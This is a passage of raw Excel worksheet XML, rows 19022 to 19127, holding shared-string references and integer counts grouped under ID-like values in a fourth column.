        <v>0</v>
      </c>
      <c r="D19022">
        <v>161</v>
      </c>
    </row>
    <row r="19023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19023" t="s">
        <v>16231</v>
      </c>
      <c r="B19023" t="s">
        <v>16212</v>
      </c>
      <c r="C19023">
        <v>0</v>
      </c>
      <c r="D19023">
        <v>161</v>
      </c>
    </row>
    <row r="19024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19024" t="s">
        <v>16228</v>
      </c>
      <c r="B19024" t="s">
        <v>16213</v>
      </c>
      <c r="C19024">
        <v>0</v>
      </c>
      <c r="D19024">
        <v>161</v>
      </c>
    </row>
    <row r="19025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19025" t="s">
        <v>16231</v>
      </c>
      <c r="B19025" t="s">
        <v>16214</v>
      </c>
      <c r="C19025">
        <v>2</v>
      </c>
      <c r="D19025">
        <v>161</v>
      </c>
    </row>
    <row r="19026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19026" t="s">
        <v>16228</v>
      </c>
      <c r="B19026" t="s">
        <v>16215</v>
      </c>
      <c r="C19026">
        <v>2</v>
      </c>
      <c r="D19026">
        <v>161</v>
      </c>
    </row>
    <row r="19027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19027" t="s">
        <v>16231</v>
      </c>
      <c r="B19027" t="s">
        <v>16216</v>
      </c>
      <c r="C19027">
        <v>0</v>
      </c>
      <c r="D19027">
        <v>161</v>
      </c>
    </row>
    <row r="19028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19028" t="s">
        <v>16228</v>
      </c>
      <c r="B19028" t="s">
        <v>16217</v>
      </c>
      <c r="C19028">
        <v>0</v>
      </c>
      <c r="D19028">
        <v>161</v>
      </c>
    </row>
    <row r="19029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19029" t="s">
        <v>16231</v>
      </c>
      <c r="B19029" t="s">
        <v>16218</v>
      </c>
      <c r="C19029">
        <v>0</v>
      </c>
      <c r="D19029">
        <v>161</v>
      </c>
    </row>
    <row r="19030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19030" t="s">
        <v>16229</v>
      </c>
      <c r="B19030" t="s">
        <v>16219</v>
      </c>
      <c r="C19030">
        <v>3</v>
      </c>
      <c r="D19030">
        <v>161</v>
      </c>
    </row>
    <row r="19031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19031" t="s">
        <v>16230</v>
      </c>
      <c r="B19031" t="s">
        <v>16220</v>
      </c>
      <c r="C19031">
        <v>0</v>
      </c>
      <c r="D19031">
        <v>161</v>
      </c>
    </row>
    <row r="19032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19032" t="s">
        <v>16229</v>
      </c>
      <c r="B19032" t="s">
        <v>16221</v>
      </c>
      <c r="C19032">
        <v>0</v>
      </c>
      <c r="D19032">
        <v>161</v>
      </c>
    </row>
    <row r="19033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19033" t="s">
        <v>16230</v>
      </c>
      <c r="B19033" t="s">
        <v>16222</v>
      </c>
      <c r="C19033">
        <v>0</v>
      </c>
      <c r="D19033">
        <v>161</v>
      </c>
    </row>
    <row r="19034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19034" t="s">
        <v>16223</v>
      </c>
      <c r="B19034" t="s">
        <v>16223</v>
      </c>
      <c r="C19034">
        <v>27</v>
      </c>
      <c r="D19034">
        <v>161</v>
      </c>
    </row>
    <row r="19035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19035" t="s">
        <v>16224</v>
      </c>
      <c r="B19035" t="s">
        <v>16224</v>
      </c>
      <c r="C19035">
        <v>0</v>
      </c>
      <c r="D19035">
        <v>161</v>
      </c>
    </row>
    <row r="19036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19036" t="s">
        <v>16228</v>
      </c>
      <c r="B19036" t="s">
        <v>16211</v>
      </c>
      <c r="C19036">
        <v>0</v>
      </c>
      <c r="D19036">
        <v>231</v>
      </c>
    </row>
    <row r="19037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19037" t="s">
        <v>16231</v>
      </c>
      <c r="B19037" t="s">
        <v>16212</v>
      </c>
      <c r="C19037">
        <v>0</v>
      </c>
      <c r="D19037">
        <v>231</v>
      </c>
    </row>
    <row r="19038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19038" t="s">
        <v>16228</v>
      </c>
      <c r="B19038" t="s">
        <v>16213</v>
      </c>
      <c r="C19038">
        <v>0</v>
      </c>
      <c r="D19038">
        <v>231</v>
      </c>
    </row>
    <row r="19039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19039" t="s">
        <v>16231</v>
      </c>
      <c r="B19039" t="s">
        <v>16214</v>
      </c>
      <c r="C19039">
        <v>0</v>
      </c>
      <c r="D19039">
        <v>231</v>
      </c>
    </row>
    <row r="19040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19040" t="s">
        <v>16228</v>
      </c>
      <c r="B19040" t="s">
        <v>16215</v>
      </c>
      <c r="C19040">
        <v>4</v>
      </c>
      <c r="D19040">
        <v>231</v>
      </c>
    </row>
    <row r="19041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19041" t="s">
        <v>16231</v>
      </c>
      <c r="B19041" t="s">
        <v>16216</v>
      </c>
      <c r="C19041">
        <v>13</v>
      </c>
      <c r="D19041">
        <v>231</v>
      </c>
    </row>
    <row r="19042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19042" t="s">
        <v>16228</v>
      </c>
      <c r="B19042" t="s">
        <v>16217</v>
      </c>
      <c r="C19042">
        <v>8</v>
      </c>
      <c r="D19042">
        <v>231</v>
      </c>
    </row>
    <row r="19043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19043" t="s">
        <v>16231</v>
      </c>
      <c r="B19043" t="s">
        <v>16218</v>
      </c>
      <c r="C19043">
        <v>0</v>
      </c>
      <c r="D19043">
        <v>231</v>
      </c>
    </row>
    <row r="19044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19044" t="s">
        <v>16229</v>
      </c>
      <c r="B19044" t="s">
        <v>16219</v>
      </c>
      <c r="C19044">
        <v>15</v>
      </c>
      <c r="D19044">
        <v>231</v>
      </c>
    </row>
    <row r="19045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19045" t="s">
        <v>16230</v>
      </c>
      <c r="B19045" t="s">
        <v>16220</v>
      </c>
      <c r="C19045">
        <v>22</v>
      </c>
      <c r="D19045">
        <v>231</v>
      </c>
    </row>
    <row r="19046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19046" t="s">
        <v>16229</v>
      </c>
      <c r="B19046" t="s">
        <v>16221</v>
      </c>
      <c r="C19046">
        <v>88</v>
      </c>
      <c r="D19046">
        <v>231</v>
      </c>
    </row>
    <row r="19047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19047" t="s">
        <v>16230</v>
      </c>
      <c r="B19047" t="s">
        <v>16222</v>
      </c>
      <c r="C19047">
        <v>392</v>
      </c>
      <c r="D19047">
        <v>231</v>
      </c>
    </row>
    <row r="19048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19048" t="s">
        <v>16223</v>
      </c>
      <c r="B19048" t="s">
        <v>16223</v>
      </c>
      <c r="C19048">
        <v>20</v>
      </c>
      <c r="D19048">
        <v>231</v>
      </c>
    </row>
    <row r="19049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19049" t="s">
        <v>16224</v>
      </c>
      <c r="B19049" t="s">
        <v>16224</v>
      </c>
      <c r="C19049">
        <v>1</v>
      </c>
      <c r="D19049">
        <v>231</v>
      </c>
    </row>
    <row r="19050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19050" t="s">
        <v>16228</v>
      </c>
      <c r="B19050" t="s">
        <v>16211</v>
      </c>
      <c r="C19050">
        <v>0</v>
      </c>
      <c r="D19050">
        <v>5290</v>
      </c>
    </row>
    <row r="19051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19051" t="s">
        <v>16231</v>
      </c>
      <c r="B19051" t="s">
        <v>16212</v>
      </c>
      <c r="C19051">
        <v>0</v>
      </c>
      <c r="D19051">
        <v>5290</v>
      </c>
    </row>
    <row r="19052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19052" t="s">
        <v>16228</v>
      </c>
      <c r="B19052" t="s">
        <v>16213</v>
      </c>
      <c r="C19052">
        <v>0</v>
      </c>
      <c r="D19052">
        <v>5290</v>
      </c>
    </row>
    <row r="19053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19053" t="s">
        <v>16231</v>
      </c>
      <c r="B19053" t="s">
        <v>16214</v>
      </c>
      <c r="C19053">
        <v>0</v>
      </c>
      <c r="D19053">
        <v>5290</v>
      </c>
    </row>
    <row r="19054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19054" t="s">
        <v>16228</v>
      </c>
      <c r="B19054" t="s">
        <v>16215</v>
      </c>
      <c r="C19054">
        <v>1</v>
      </c>
      <c r="D19054">
        <v>5290</v>
      </c>
    </row>
    <row r="19055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19055" t="s">
        <v>16231</v>
      </c>
      <c r="B19055" t="s">
        <v>16216</v>
      </c>
      <c r="C19055">
        <v>1</v>
      </c>
      <c r="D19055">
        <v>5290</v>
      </c>
    </row>
    <row r="19056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19056" t="s">
        <v>16228</v>
      </c>
      <c r="B19056" t="s">
        <v>16217</v>
      </c>
      <c r="C19056">
        <v>0</v>
      </c>
      <c r="D19056">
        <v>5290</v>
      </c>
    </row>
    <row r="19057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19057" t="s">
        <v>16231</v>
      </c>
      <c r="B19057" t="s">
        <v>16218</v>
      </c>
      <c r="C19057">
        <v>0</v>
      </c>
      <c r="D19057">
        <v>5290</v>
      </c>
    </row>
    <row r="19058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19058" t="s">
        <v>16229</v>
      </c>
      <c r="B19058" t="s">
        <v>16219</v>
      </c>
      <c r="C19058">
        <v>0</v>
      </c>
      <c r="D19058">
        <v>5290</v>
      </c>
    </row>
    <row r="19059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19059" t="s">
        <v>16230</v>
      </c>
      <c r="B19059" t="s">
        <v>16220</v>
      </c>
      <c r="C19059">
        <v>0</v>
      </c>
      <c r="D19059">
        <v>5290</v>
      </c>
    </row>
    <row r="19060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19060" t="s">
        <v>16229</v>
      </c>
      <c r="B19060" t="s">
        <v>16221</v>
      </c>
      <c r="C19060">
        <v>12</v>
      </c>
      <c r="D19060">
        <v>5290</v>
      </c>
    </row>
    <row r="19061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19061" t="s">
        <v>16230</v>
      </c>
      <c r="B19061" t="s">
        <v>16222</v>
      </c>
      <c r="C19061">
        <v>3</v>
      </c>
      <c r="D19061">
        <v>5290</v>
      </c>
    </row>
    <row r="19062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19062" t="s">
        <v>16223</v>
      </c>
      <c r="B19062" t="s">
        <v>16223</v>
      </c>
      <c r="C19062">
        <v>24</v>
      </c>
      <c r="D19062">
        <v>5290</v>
      </c>
    </row>
    <row r="19063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19063" t="s">
        <v>16224</v>
      </c>
      <c r="B19063" t="s">
        <v>16224</v>
      </c>
      <c r="C19063">
        <v>0</v>
      </c>
      <c r="D19063">
        <v>5290</v>
      </c>
    </row>
    <row r="19064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19064" t="s">
        <v>16228</v>
      </c>
      <c r="B19064" t="s">
        <v>16211</v>
      </c>
      <c r="C19064">
        <v>0</v>
      </c>
      <c r="D19064">
        <v>204</v>
      </c>
    </row>
    <row r="19065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19065" t="s">
        <v>16231</v>
      </c>
      <c r="B19065" t="s">
        <v>16212</v>
      </c>
      <c r="C19065">
        <v>0</v>
      </c>
      <c r="D19065">
        <v>204</v>
      </c>
    </row>
    <row r="19066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19066" t="s">
        <v>16228</v>
      </c>
      <c r="B19066" t="s">
        <v>16213</v>
      </c>
      <c r="C19066">
        <v>0</v>
      </c>
      <c r="D19066">
        <v>204</v>
      </c>
    </row>
    <row r="19067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19067" t="s">
        <v>16231</v>
      </c>
      <c r="B19067" t="s">
        <v>16214</v>
      </c>
      <c r="C19067">
        <v>0</v>
      </c>
      <c r="D19067">
        <v>204</v>
      </c>
    </row>
    <row r="19068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19068" t="s">
        <v>16228</v>
      </c>
      <c r="B19068" t="s">
        <v>16215</v>
      </c>
      <c r="C19068">
        <v>2</v>
      </c>
      <c r="D19068">
        <v>204</v>
      </c>
    </row>
    <row r="19069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19069" t="s">
        <v>16231</v>
      </c>
      <c r="B19069" t="s">
        <v>16216</v>
      </c>
      <c r="C19069">
        <v>2</v>
      </c>
      <c r="D19069">
        <v>204</v>
      </c>
    </row>
    <row r="19070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19070" t="s">
        <v>16228</v>
      </c>
      <c r="B19070" t="s">
        <v>16217</v>
      </c>
      <c r="C19070">
        <v>2</v>
      </c>
      <c r="D19070">
        <v>204</v>
      </c>
    </row>
    <row r="19071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19071" t="s">
        <v>16231</v>
      </c>
      <c r="B19071" t="s">
        <v>16218</v>
      </c>
      <c r="C19071">
        <v>0</v>
      </c>
      <c r="D19071">
        <v>204</v>
      </c>
    </row>
    <row r="19072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19072" t="s">
        <v>16229</v>
      </c>
      <c r="B19072" t="s">
        <v>16219</v>
      </c>
      <c r="C19072">
        <v>0</v>
      </c>
      <c r="D19072">
        <v>204</v>
      </c>
    </row>
    <row r="19073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19073" t="s">
        <v>16230</v>
      </c>
      <c r="B19073" t="s">
        <v>16220</v>
      </c>
      <c r="C19073">
        <v>0</v>
      </c>
      <c r="D19073">
        <v>204</v>
      </c>
    </row>
    <row r="19074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19074" t="s">
        <v>16229</v>
      </c>
      <c r="B19074" t="s">
        <v>16221</v>
      </c>
      <c r="C19074">
        <v>12</v>
      </c>
      <c r="D19074">
        <v>204</v>
      </c>
    </row>
    <row r="19075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19075" t="s">
        <v>16230</v>
      </c>
      <c r="B19075" t="s">
        <v>16222</v>
      </c>
      <c r="C19075">
        <v>48</v>
      </c>
      <c r="D19075">
        <v>204</v>
      </c>
    </row>
    <row r="19076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19076" t="s">
        <v>16223</v>
      </c>
      <c r="B19076" t="s">
        <v>16223</v>
      </c>
      <c r="C19076">
        <v>25</v>
      </c>
      <c r="D19076">
        <v>204</v>
      </c>
    </row>
    <row r="19077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19077" t="s">
        <v>16224</v>
      </c>
      <c r="B19077" t="s">
        <v>16224</v>
      </c>
      <c r="C19077">
        <v>1</v>
      </c>
      <c r="D19077">
        <v>204</v>
      </c>
    </row>
    <row r="19078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19078" t="s">
        <v>16228</v>
      </c>
      <c r="B19078" t="s">
        <v>16211</v>
      </c>
      <c r="C19078">
        <v>0</v>
      </c>
      <c r="D19078">
        <v>2009</v>
      </c>
    </row>
    <row r="19079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19079" t="s">
        <v>16231</v>
      </c>
      <c r="B19079" t="s">
        <v>16212</v>
      </c>
      <c r="C19079">
        <v>0</v>
      </c>
      <c r="D19079">
        <v>2009</v>
      </c>
    </row>
    <row r="19080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19080" t="s">
        <v>16228</v>
      </c>
      <c r="B19080" t="s">
        <v>16213</v>
      </c>
      <c r="C19080">
        <v>0</v>
      </c>
      <c r="D19080">
        <v>2009</v>
      </c>
    </row>
    <row r="19081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19081" t="s">
        <v>16231</v>
      </c>
      <c r="B19081" t="s">
        <v>16214</v>
      </c>
      <c r="C19081">
        <v>0</v>
      </c>
      <c r="D19081">
        <v>2009</v>
      </c>
    </row>
    <row r="19082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19082" t="s">
        <v>16228</v>
      </c>
      <c r="B19082" t="s">
        <v>16215</v>
      </c>
      <c r="C19082">
        <v>10</v>
      </c>
      <c r="D19082">
        <v>2009</v>
      </c>
    </row>
    <row r="19083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19083" t="s">
        <v>16231</v>
      </c>
      <c r="B19083" t="s">
        <v>16216</v>
      </c>
      <c r="C19083">
        <v>8</v>
      </c>
      <c r="D19083">
        <v>2009</v>
      </c>
    </row>
    <row r="19084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19084" t="s">
        <v>16228</v>
      </c>
      <c r="B19084" t="s">
        <v>16217</v>
      </c>
      <c r="C19084">
        <v>17</v>
      </c>
      <c r="D19084">
        <v>2009</v>
      </c>
    </row>
    <row r="19085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19085" t="s">
        <v>16231</v>
      </c>
      <c r="B19085" t="s">
        <v>16218</v>
      </c>
      <c r="C19085">
        <v>4</v>
      </c>
      <c r="D19085">
        <v>2009</v>
      </c>
    </row>
    <row r="19086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19086" t="s">
        <v>16229</v>
      </c>
      <c r="B19086" t="s">
        <v>16219</v>
      </c>
      <c r="C19086">
        <v>11</v>
      </c>
      <c r="D19086">
        <v>2009</v>
      </c>
    </row>
    <row r="19087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19087" t="s">
        <v>16230</v>
      </c>
      <c r="B19087" t="s">
        <v>16220</v>
      </c>
      <c r="C19087">
        <v>31</v>
      </c>
      <c r="D19087">
        <v>2009</v>
      </c>
    </row>
    <row r="19088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19088" t="s">
        <v>16229</v>
      </c>
      <c r="B19088" t="s">
        <v>16221</v>
      </c>
      <c r="C19088">
        <v>0</v>
      </c>
      <c r="D19088">
        <v>2009</v>
      </c>
    </row>
    <row r="19089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19089" t="s">
        <v>16230</v>
      </c>
      <c r="B19089" t="s">
        <v>16222</v>
      </c>
      <c r="C19089">
        <v>0</v>
      </c>
      <c r="D19089">
        <v>2009</v>
      </c>
    </row>
    <row r="19090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19090" t="s">
        <v>16223</v>
      </c>
      <c r="B19090" t="s">
        <v>16223</v>
      </c>
      <c r="C19090">
        <v>38</v>
      </c>
      <c r="D19090">
        <v>2009</v>
      </c>
    </row>
    <row r="19091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19091" t="s">
        <v>16224</v>
      </c>
      <c r="B19091" t="s">
        <v>16224</v>
      </c>
      <c r="C19091">
        <v>43</v>
      </c>
      <c r="D19091">
        <v>2009</v>
      </c>
    </row>
    <row r="19092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19092" t="s">
        <v>16228</v>
      </c>
      <c r="B19092" t="s">
        <v>16211</v>
      </c>
      <c r="C19092">
        <v>0</v>
      </c>
      <c r="D19092">
        <v>5597</v>
      </c>
    </row>
    <row r="19093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19093" t="s">
        <v>16231</v>
      </c>
      <c r="B19093" t="s">
        <v>16212</v>
      </c>
      <c r="C19093">
        <v>0</v>
      </c>
      <c r="D19093">
        <v>5597</v>
      </c>
    </row>
    <row r="19094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19094" t="s">
        <v>16228</v>
      </c>
      <c r="B19094" t="s">
        <v>16213</v>
      </c>
      <c r="C19094">
        <v>0</v>
      </c>
      <c r="D19094">
        <v>5597</v>
      </c>
    </row>
    <row r="19095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19095" t="s">
        <v>16231</v>
      </c>
      <c r="B19095" t="s">
        <v>16214</v>
      </c>
      <c r="C19095">
        <v>0</v>
      </c>
      <c r="D19095">
        <v>5597</v>
      </c>
    </row>
    <row r="19096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19096" t="s">
        <v>16228</v>
      </c>
      <c r="B19096" t="s">
        <v>16215</v>
      </c>
      <c r="C19096">
        <v>6</v>
      </c>
      <c r="D19096">
        <v>5597</v>
      </c>
    </row>
    <row r="19097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19097" t="s">
        <v>16231</v>
      </c>
      <c r="B19097" t="s">
        <v>16216</v>
      </c>
      <c r="C19097">
        <v>6</v>
      </c>
      <c r="D19097">
        <v>5597</v>
      </c>
    </row>
    <row r="19098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19098" t="s">
        <v>16228</v>
      </c>
      <c r="B19098" t="s">
        <v>16217</v>
      </c>
      <c r="C19098">
        <v>0</v>
      </c>
      <c r="D19098">
        <v>5597</v>
      </c>
    </row>
    <row r="19099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19099" t="s">
        <v>16231</v>
      </c>
      <c r="B19099" t="s">
        <v>16218</v>
      </c>
      <c r="C19099">
        <v>0</v>
      </c>
      <c r="D19099">
        <v>5597</v>
      </c>
    </row>
    <row r="19100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19100" t="s">
        <v>16229</v>
      </c>
      <c r="B19100" t="s">
        <v>16219</v>
      </c>
      <c r="C19100">
        <v>0</v>
      </c>
      <c r="D19100">
        <v>5597</v>
      </c>
    </row>
    <row r="19101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19101" t="s">
        <v>16230</v>
      </c>
      <c r="B19101" t="s">
        <v>16220</v>
      </c>
      <c r="C19101">
        <v>0</v>
      </c>
      <c r="D19101">
        <v>5597</v>
      </c>
    </row>
    <row r="19102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19102" t="s">
        <v>16229</v>
      </c>
      <c r="B19102" t="s">
        <v>16221</v>
      </c>
      <c r="C19102">
        <v>0</v>
      </c>
      <c r="D19102">
        <v>5597</v>
      </c>
    </row>
    <row r="19103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19103" t="s">
        <v>16230</v>
      </c>
      <c r="B19103" t="s">
        <v>16222</v>
      </c>
      <c r="C19103">
        <v>0</v>
      </c>
      <c r="D19103">
        <v>5597</v>
      </c>
    </row>
    <row r="19104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19104" t="s">
        <v>16223</v>
      </c>
      <c r="B19104" t="s">
        <v>16223</v>
      </c>
      <c r="C19104">
        <v>15</v>
      </c>
      <c r="D19104">
        <v>5597</v>
      </c>
    </row>
    <row r="19105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19105" t="s">
        <v>16224</v>
      </c>
      <c r="B19105" t="s">
        <v>16224</v>
      </c>
      <c r="C19105">
        <v>1</v>
      </c>
      <c r="D19105">
        <v>5597</v>
      </c>
    </row>
    <row r="19106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19106" t="s">
        <v>16228</v>
      </c>
      <c r="B19106" t="s">
        <v>16211</v>
      </c>
      <c r="C19106">
        <v>0</v>
      </c>
      <c r="D19106">
        <v>5598</v>
      </c>
    </row>
    <row r="19107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19107" t="s">
        <v>16231</v>
      </c>
      <c r="B19107" t="s">
        <v>16212</v>
      </c>
      <c r="C19107">
        <v>0</v>
      </c>
      <c r="D19107">
        <v>5598</v>
      </c>
    </row>
    <row r="19108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19108" t="s">
        <v>16228</v>
      </c>
      <c r="B19108" t="s">
        <v>16213</v>
      </c>
      <c r="C19108">
        <v>0</v>
      </c>
      <c r="D19108">
        <v>5598</v>
      </c>
    </row>
    <row r="19109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19109" t="s">
        <v>16231</v>
      </c>
      <c r="B19109" t="s">
        <v>16214</v>
      </c>
      <c r="C19109">
        <v>0</v>
      </c>
      <c r="D19109">
        <v>5598</v>
      </c>
    </row>
    <row r="19110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19110" t="s">
        <v>16228</v>
      </c>
      <c r="B19110" t="s">
        <v>16215</v>
      </c>
      <c r="C19110">
        <v>0</v>
      </c>
      <c r="D19110">
        <v>5598</v>
      </c>
    </row>
    <row r="19111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19111" t="s">
        <v>16231</v>
      </c>
      <c r="B19111" t="s">
        <v>16216</v>
      </c>
      <c r="C19111">
        <v>0</v>
      </c>
      <c r="D19111">
        <v>5598</v>
      </c>
    </row>
    <row r="19112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19112" t="s">
        <v>16228</v>
      </c>
      <c r="B19112" t="s">
        <v>16217</v>
      </c>
      <c r="C19112">
        <v>0</v>
      </c>
      <c r="D19112">
        <v>5598</v>
      </c>
    </row>
    <row r="19113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19113" t="s">
        <v>16231</v>
      </c>
      <c r="B19113" t="s">
        <v>16218</v>
      </c>
      <c r="C19113">
        <v>0</v>
      </c>
      <c r="D19113">
        <v>5598</v>
      </c>
    </row>
    <row r="19114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19114" t="s">
        <v>16229</v>
      </c>
      <c r="B19114" t="s">
        <v>16219</v>
      </c>
      <c r="C19114">
        <v>3</v>
      </c>
      <c r="D19114">
        <v>5598</v>
      </c>
    </row>
    <row r="19115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19115" t="s">
        <v>16230</v>
      </c>
      <c r="B19115" t="s">
        <v>16220</v>
      </c>
      <c r="C19115">
        <v>0</v>
      </c>
      <c r="D19115">
        <v>5598</v>
      </c>
    </row>
    <row r="19116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19116" t="s">
        <v>16229</v>
      </c>
      <c r="B19116" t="s">
        <v>16221</v>
      </c>
      <c r="C19116">
        <v>0</v>
      </c>
      <c r="D19116">
        <v>5598</v>
      </c>
    </row>
    <row r="19117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19117" t="s">
        <v>16230</v>
      </c>
      <c r="B19117" t="s">
        <v>16222</v>
      </c>
      <c r="C19117">
        <v>0</v>
      </c>
      <c r="D19117">
        <v>5598</v>
      </c>
    </row>
    <row r="19118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19118" t="s">
        <v>16223</v>
      </c>
      <c r="B19118" t="s">
        <v>16223</v>
      </c>
      <c r="C19118">
        <v>20</v>
      </c>
      <c r="D19118">
        <v>5598</v>
      </c>
    </row>
    <row r="19119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19119" t="s">
        <v>16224</v>
      </c>
      <c r="B19119" t="s">
        <v>16224</v>
      </c>
      <c r="C19119">
        <v>1</v>
      </c>
      <c r="D19119">
        <v>5598</v>
      </c>
    </row>
    <row r="19120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19120" t="s">
        <v>16228</v>
      </c>
      <c r="B19120" t="s">
        <v>16211</v>
      </c>
      <c r="C19120">
        <v>0</v>
      </c>
      <c r="D19120">
        <v>5600</v>
      </c>
    </row>
    <row r="19121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19121" t="s">
        <v>16231</v>
      </c>
      <c r="B19121" t="s">
        <v>16212</v>
      </c>
      <c r="C19121">
        <v>0</v>
      </c>
      <c r="D19121">
        <v>5600</v>
      </c>
    </row>
    <row r="19122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19122" t="s">
        <v>16228</v>
      </c>
      <c r="B19122" t="s">
        <v>16213</v>
      </c>
      <c r="C19122">
        <v>0</v>
      </c>
      <c r="D19122">
        <v>5600</v>
      </c>
    </row>
    <row r="19123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19123" t="s">
        <v>16231</v>
      </c>
      <c r="B19123" t="s">
        <v>16214</v>
      </c>
      <c r="C19123">
        <v>0</v>
      </c>
      <c r="D19123">
        <v>5600</v>
      </c>
    </row>
    <row r="19124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19124" t="s">
        <v>16228</v>
      </c>
      <c r="B19124" t="s">
        <v>16215</v>
      </c>
      <c r="C19124">
        <v>1</v>
      </c>
      <c r="D19124">
        <v>5600</v>
      </c>
    </row>
    <row r="19125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19125" t="s">
        <v>16231</v>
      </c>
      <c r="B19125" t="s">
        <v>16216</v>
      </c>
      <c r="C19125">
        <v>0</v>
      </c>
      <c r="D19125">
        <v>5600</v>
      </c>
    </row>
    <row r="19126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19126" t="s">
        <v>16228</v>
      </c>
      <c r="B19126" t="s">
        <v>16217</v>
      </c>
      <c r="C19126">
        <v>4</v>
      </c>
      <c r="D19126">
        <v>5600</v>
      </c>
    </row>
    <row r="19127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19127" t="s">
        <v>16231</v>
      </c>
      <c r="B19127" t="s">
        <v>16218</v>
      </c>
      <c r="C19127">
        <v>0</v>
      </c>
      <c r="D19127">
